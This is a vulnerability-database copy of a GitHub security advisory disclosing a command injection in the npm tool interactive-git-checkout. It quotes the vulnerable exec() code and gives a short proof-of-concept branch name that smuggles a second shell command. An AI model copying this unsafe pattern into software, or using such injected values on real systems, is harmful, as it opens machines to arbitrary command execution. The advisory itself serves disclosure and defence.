ghsa-4wcm-7hjf-6xw5
Vulnerability from github
Published
2025-09-10 21:37
Modified
2025-09-10 21:37
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
interactive-git-checkout has a Command Injection vulnerability
Details

The npm package interactive-git-checkout is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via npm install -g interactive-git-checkout.

Resources: * Project's npm package: https://www.npmjs.com/package/interactive-git-checkout

Command Injection Vulnerability

The interactive-git-checkout tool is vulnerable to a command injection vulnerability because it passes the branch name to the git checkout command using the Node.js child process module's exec() function without proper input validation or sanitization.

The following vulnerable code snippets demonstrates the issue:

```js const { exec: execCb } = require('child_process'); const { promisify } = require('util');

const exec = promisify(execCb);

module.exports = async (targetBranch) => { const { stdout, stderr } = await exec(git checkout ${targetBranch}); process.stderr.write(stderr); process.stdout.write(stdout); }; ```

Exploit Proof of Concept

  1. Install the interactive-git-checkout package (as suggested by the package's README):

bash npm install --global interactive-git-checkout

  1. Run the executable exposed by the installed package:

bash $ igc

  1. When prompted, enter the following branch name:

bash hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #

Vulnerable versions

All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of 1.1.4.

Author

Liran Tal

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "interactive-git-checkout"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59046"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-10T21:37:00Z",
    "nvd_published_at": "2025-09-09T23:15:37Z",
    "severity": "CRITICAL"
  },
  "details": "The npm package `interactive-git-checkout` is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`.\n\nResources: \n * Project\u0027s npm package: https://www.npmjs.com/package/interactive-git-checkout\n \n## Command Injection Vulnerability\n\nThe `interactive-git-checkout` tool is vulnerable to a command injection vulnerability because it passes the branch name to the `git checkout` command using the Node.js child process module\u0027s `exec()` function without proper input validation or sanitization.\n\nThe following vulnerable code snippets demonstrates the issue:\n\n```js\nconst { exec: execCb } = require(\u0027child_process\u0027);\nconst { promisify } = require(\u0027util\u0027);\n\nconst exec = promisify(execCb);\n\nmodule.exports = async (targetBranch) =\u003e {\n    const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);\n    process.stderr.write(stderr);\n    process.stdout.write(stdout);\n};\n```\n\n## Exploit Proof of Concept\n\n1. Install the `interactive-git-checkout` package (as suggested by the package\u0027s README):\n\n```bash\nnpm install --global interactive-git-checkout\n```\n\n2. Run the executable exposed by the installed package:\n\n```bash\n$ igc\n```\n\n3. When prompted, enter the following branch name:\n\n```bash\nhello ; echo \u0027Command Injection Vulnerability Exploited!\u0027 \u003e /tmp/command-injection.txt; #\n```\n\n## Vulnerable versions\n\nAll versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of `1.1.4`.\n\n# Author\n\nLiran Tal",
  "id": "GHSA-4wcm-7hjf-6xw5",
  "modified": "2025-09-10T21:37:00Z",
  "published": "2025-09-10T21:37:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ninofiliu/interactive-git-checkout/security/advisories/GHSA-4wcm-7hjf-6xw5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59046"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ninofiliu/interactive-git-checkout/commit/8dd832dd302af287a61611f4f85e157cd1c6bb41"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ninofiliu/interactive-git-checkout"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "interactive-git-checkout has a Command Injection vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.